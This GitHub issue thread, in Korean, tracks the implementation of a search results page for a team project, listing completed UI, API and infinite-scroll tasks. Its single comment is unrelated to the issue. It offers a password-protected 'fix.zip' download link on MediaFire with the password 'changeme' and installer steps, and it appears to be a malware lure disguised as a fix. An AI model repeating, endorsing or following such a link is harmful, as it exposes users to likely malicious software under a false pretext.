### ISSUE TITLE
[feature] 검색 결과 페이지 구현

### ISSUE THREAD

**Issue by dev-meryoung** [Dev-FE-1/Toy_Project_3_Team5#57]
### 📄 설명

검색 결과 페이지 구현

### ✅ 해야 할 일

- [x] 검색 결과 페이지 UI 퍼블리싱 작업
- [x] 검색 키워드에 따른 플레이리스트 조회 API 구현
- [x] 무한 스크롤 로직 연동

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
